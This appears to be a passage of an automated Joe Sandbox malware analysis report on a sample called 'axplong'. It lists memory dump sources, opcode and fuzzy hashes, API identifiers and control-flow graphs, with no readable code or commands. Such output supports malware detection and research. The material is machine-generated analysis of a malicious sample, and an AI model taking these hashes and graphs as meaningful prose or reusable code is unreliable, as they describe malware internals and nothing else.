                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 854de53750cea70500735515013a164f5d51ba9f6b3da6f973f832939f7e7903
                                                                                                                                                                            • Instruction ID: eb48fded077b9093a6c72e2ad1b469909c23a86e40ac93c13150cd4e62cf4474
                                                                                                                                                                            • Opcode Fuzzy Hash: 854de53750cea70500735515013a164f5d51ba9f6b3da6f973f832939f7e7903
                                                                                                                                                                            • Instruction Fuzzy Hash: 16C11671A102489BEF28DF68CDC5B9D7BB5EF45304F508218F806AB296D739DA84CB91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2002 c8d4f4-c8d515 call c6deb0 2005 c8d52f-c8d532 2002->2005 2006 c8d517 2002->2006 2008 c8d54e-c8d55a call c8a688 2005->2008 2009 c8d534-c8d537 2005->2009 2007 c8d519-c8d51f 2006->2007 2006->2008 2010 c8d521-c8d525 2007->2010 2011 c8d543-c8d54c call c8d43c 2007->2011 2022 c8d55c-c8d55f 2008->2022 2023 c8d564-c8d570 call c8d47e 2008->2023 2009->2011 2012 c8d539-c8d53c 2009->2012 2010->2008 2014 c8d527-c8d52b 2010->2014 2027 c8d58c-c8d595 2011->2027 2015 c8d53e-c8d541 2012->2015 2016 c8d572-c8d582 call c87443 call c86b8a 2012->2016 2014->2016 2019 c8d52d 2014->2019 2015->2011 2015->2016 2016->2022 2019->2011 2024 c8d6cb-c8d6da 2022->2024 2023->2016 2032 c8d584-c8d589 2023->2032 2030 c8d5a2-c8d5b3 2027->2030 2031 c8d597-c8d59f call c88c8b 2027->2031 2035 c8d5c9 2030->2035 2036 c8d5b5-c8d5c7 2030->2036 2031->2030 2032->2027 2037 c8d5cb-c8d5dc 2035->2037 2036->2037 2039 c8d64a-c8d65a call c8d687 2037->2039 2040 c8d5de-c8d5e0 2037->2040 2049 c8d6c9 2039->2049 2050 c8d65c-c8d65e 2039->2050 2042 c8d6db-c8d6dd 2040->2042 2043 c8d5e6-c8d5e8 2040->2043 2047 c8d6df-c8d6e6 call c88cd3 2042->2047 2048 c8d6e7-c8d6fa call c8651d 2042->2048 2045 c8d5ea-c8d5ed 2043->2045 2046 c8d5f4-c8d600 2043->2046 2045->2046 2051 c8d5ef-c8d5f2 2045->2051 2052 c8d640-c8d648 2046->2052 2053 c8d602-c8d617 call c8d4eb * 2 2046->2053 2047->2048 2066 c8d708-c8d70e 2048->2066 2067 c8d6fc-c8d706 2048->2067 2049->2024 2056 c8d699-c8d6a2 2050->2056 2057 c8d660-c8d676 call c8a531 2050->2057 2051->2046 2058 c8d61a-c8d61c 2051->2058 2052->2039 2053->2058 2079 c8d6a5-c8d6a8 2056->2079 2057->2079 2058->2052 2064 c8d61e-c8d62e 2058->2064 2071 c8d630-c8d635 2064->2071 2073 c8d710-c8d711 2066->2073 2074 c8d727-c8d730 2066->2074 2067->2066 2072 c8d73c-c8d747 call c87443 2067->2072 2071->2039 2076 c8d637-c8d63e 2071->2076 2088 c8d749-c8d74b 2072->2088 2073->2074 2082 c8d736-c8d738 2074->2082 2076->2071 2080 c8d6aa-c8d6ad 2079->2080 2081 c8d6b4-c8d6bc 2079->2081 2080->2081 2084 c8d6af-c8d6b2 2080->2084 2081->2049 2085 c8d6be-c8d6c6 call c8a531 2081->2085 2086 c8d73a 2082->2086 2087 c8d713-c8d71a call c89c81 2082->2087 2084->2049 2084->2081 2085->2049 2086->2088 2087->2072 2094 c8d71c-c8d725 call c88cf9 2087->2094 2094->2072 2094->2074
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 30c44c75a49b33cedbe3d95ea50649fdee69dc0c92911035463c3e4b3672f7e1
                                                                                                                                                                            • Instruction ID: 9493d1cef3ece4a9455d68040223604e21af95a4a0e7e7d1b04593b76a28381d
                                                                                                                                                                            • Opcode Fuzzy Hash: 30c44c75a49b33cedbe3d95ea50649fdee69dc0c92911035463c3e4b3672f7e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 506127B2D002188FDF25FFA8D8857EEB7B1AF4531DF24451AE467A72D0E6308E409B59

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2144 c582b0-c58331 call c84020 2148 c58333-c58338 2144->2148 2149 c5833d-c58365 call c67870 call c55b20 2144->2149 2150 c5847f-c5849b call c6cf21 2148->2150 2157 c58367 2149->2157 2158 c58369-c5838b call c67870 call c55b20 2149->2158 2157->2158 2163 c5838d 2158->2163 2164 c5838f-c583a8 2158->2164 2163->2164 2167 c583d9-c58404 2164->2167 2168 c583aa-c583b9 2164->2168 2169 c58406-c58415 2167->2169 2170 c58431-c58452 2167->2170 2171 c583cf-c583d6 call c6d593 2168->2171 2172 c583bb-c583c9 2168->2172 2174 c58427-c5842e call c6d593 2169->2174 2175 c58417-c58425 2169->2175 2176 c58454 2170->2176 2177 c58458-c5845d 2170->2177 2171->2167 2172->2171 2178 c5849c-c584a1 call c86b9a 2172->2178 2174->2170 2175->2174 2175->2178 2184 c58456 2176->2184 2186 c5845e-c58465 2177->2186 2184->2186 2186->2150 2187 c58467-c5846f 2186->2187 2188 c58471-c58476 2187->2188 2189 c58478-c5847b 2187->2189 2188->2150 2189->2150 2190 c5847d 2189->2190 2190->2150
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ef8cf8ea52905b406827762fc84ebf5d1d19b8248e25576dfa8b1afffadabfa7
                                                                                                                                                                            • Instruction ID: c924e25a76c03e7bfd5cb1a0ae86dd37c36c33e132f74aa159dda36db43cdddb
                                                                                                                                                                            • Opcode Fuzzy Hash: ef8cf8ea52905b406827762fc84ebf5d1d19b8248e25576dfa8b1afffadabfa7
                                                                                                                                                                            • Instruction Fuzzy Hash: DD514974D002089BEB24EB28CD897EEB775DB45301F5042A8EC15B72D1EF359EC88B95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3961434b3fd95b1bdb0e49106820919c814e92c261883d3439416d26d80e5278
                                                                                                                                                                            • Instruction ID: 144919d3f90977c8f4f7fde24fdfcd7fd384c1192fbba1577ea5cd7d46086395
                                                                                                                                                                            • Opcode Fuzzy Hash: 3961434b3fd95b1bdb0e49106820919c814e92c261883d3439416d26d80e5278
                                                                                                                                                                            • Instruction Fuzzy Hash: 01510570A002589FDB24DF28CD89BDEBBB5EB45310F1042E9E819A7381DB755E88CB95
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4078500453-0
                                                                                                                                                                            • Opcode ID: 1d19d27551f4f7d32ebcf71bc43f54aeefdbb8b6f945458efda32afb0f4ada2a
                                                                                                                                                                            • Instruction ID: 6673fbee70234208baae3fb07a32476f375c034ad5fc352ecaf7b4f3d3a67ce2
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d19d27551f4f7d32ebcf71bc43f54aeefdbb8b6f945458efda32afb0f4ada2a
                                                                                                                                                                            • Instruction Fuzzy Hash: DC418A71A10148DBDB08EBB8DC8AB9DBB79EB49310F50471DE802A72C1E7359E88C791
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5d49ab3847915431f275a2765d812577c3b964e11e41f8f2e530ea398768036b
                                                                                                                                                                            • Instruction ID: f3369dd62e8df2f816b72ed21f5599049ff4f3efabbc7023b34e18fab6125136
                                                                                                                                                                            • Opcode Fuzzy Hash: 5d49ab3847915431f275a2765d812577c3b964e11e41f8f2e530ea398768036b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E21F872A012087AEB117B649C42F9F37299F4237CF204311F9343B1D1E7709E05A7A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: fa737c0f43eab1c64680db04586e7415d146327ca062723863845fba479e3dd7
                                                                                                                                                                            • Instruction ID: 20c9a7809fad5901d00428545f4d439eb94d3b11649953a505a12af57d5b5c74
                                                                                                                                                                            • Opcode Fuzzy Hash: fa737c0f43eab1c64680db04586e7415d146327ca062723863845fba479e3dd7
                                                                                                                                                                            • Instruction Fuzzy Hash: 90016DEA07C114BDE242C5416A6EEFA6B7FE9E56303308422F887E5402E2D55A9D5271
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d1da7878cdd4ead14ac33db8cead2de03ee8d730cec5889e7c73dc4e3d136d86
                                                                                                                                                                            • Instruction ID: 2f91c79aef7bff5fb71f7e545dc4dd18e71a37f0db56963077b73d87450f7c0f
                                                                                                                                                                            • Opcode Fuzzy Hash: d1da7878cdd4ead14ac33db8cead2de03ee8d730cec5889e7c73dc4e3d136d86
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D0180EB1BC114FEE282C1416A1EEFA663FE9E16303308427F887E5402E2D45A5D5271
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5fdae1785eeafa6c0ecff3901a43a0e20fbbac50475efb12e58213e1cedfd336
                                                                                                                                                                            • Instruction ID: f05c3b6e5ffd4b6b683e237e8037e84e649146417be627484b414806f43cb188
                                                                                                                                                                            • Opcode Fuzzy Hash: 5fdae1785eeafa6c0ecff3901a43a0e20fbbac50475efb12e58213e1cedfd336
                                                                                                                                                                            • Instruction Fuzzy Hash: 980192EB17C110FDE242C1816A1EEFA6B3FE9E17303308423F483E5502E2D46A9D5271
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3f5feae313accabb96eb2652236dd1c56d7dbe71cf8b4fe3dbb37594afb97248
                                                                                                                                                                            • Instruction ID: 8b43b14583cc369802558d447519caadedd9f0e9f4553fac0c26ab4b4fc7e3f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f5feae313accabb96eb2652236dd1c56d7dbe71cf8b4fe3dbb37594afb97248
                                                                                                                                                                            • Instruction Fuzzy Hash: 851148F607C111EEE342D5516A5E9FA7B3BEAD22307308463F483D6806E2C9A9995231
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5b61de929ddb082a7e069f5e21f075e34ad62539964491e1a20e8a787d880f66
                                                                                                                                                                            • Instruction ID: e4553acf0f72cbbd2dd3f19cf8c43faedbc2f2d4bff3ceed6dae415ffa5cde94
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b61de929ddb082a7e069f5e21f075e34ad62539964491e1a20e8a787d880f66
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11E772D00218AFDF51BFB4DD0579D7BB0EF00328F20816AE866A71D1DB719A40AB99
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                                                                            • Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_c50000_axplong.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: b80c5fa3607b725b1f4ed4c6e453079e0c9a9bf250c4bc75e0beb8319e6fa4db
                                                                                                                                                                            • Instruction ID: f741c123ee07dca59961d452fb2da5816aa945dafe9ff11b6af3c1ff7bf4db5d
                                                                                                                                                                            • Opcode Fuzzy Hash: b80c5fa3607b725b1f4ed4c6e453079e0c9a9bf250c4bc75e0beb8319e6fa4db
                                                                                                                                                                            • Instruction Fuzzy Hash: CD11E27690020CAACB10EED5D944FDF77BD9B08314F505266F611E6180DB31EB45CB65
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d4325be3dfdc19774298b712df4fa27090ed4404318cf2f540278e56183b6ffa
                                                                                                                                                                            • Instruction ID: 15f0a6952600b95b3b0647d5817f612096ffc2e07f3bca33f2d29b16d3716ffb
                                                                                                                                                                            • Opcode Fuzzy Hash: d4325be3dfdc19774298b712df4fa27090ed4404318cf2f540278e56183b6ffa
                                                                                                                                                                            • Instruction Fuzzy Hash: ECF054EB07C110FDE281C1826A5EAFA6B3FE9E67303708413F443E4902E2D56A9D5231
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3763780201.0000000005230000.00000040.00001000.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_13_2_5230000_axplong.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7873f3c047af57b422676a9b3cc174ff4bdf1268026267244494152baaea56a8
                                                                                                                                                                            • Instruction ID: 4cd02f20ec77f0c71d3a663db9faf14d92cc8b94d216e7b72a1ee33d02fe4b54
                                                                                                                                                                            • Opcode Fuzzy Hash: 7873f3c047af57b422676a9b3cc174ff4bdf1268026267244494152baaea56a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 16F0B4EB17C010FDE281C582365E9FAA72FF9F66303708863F483D1502E2C56A5D1231
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true
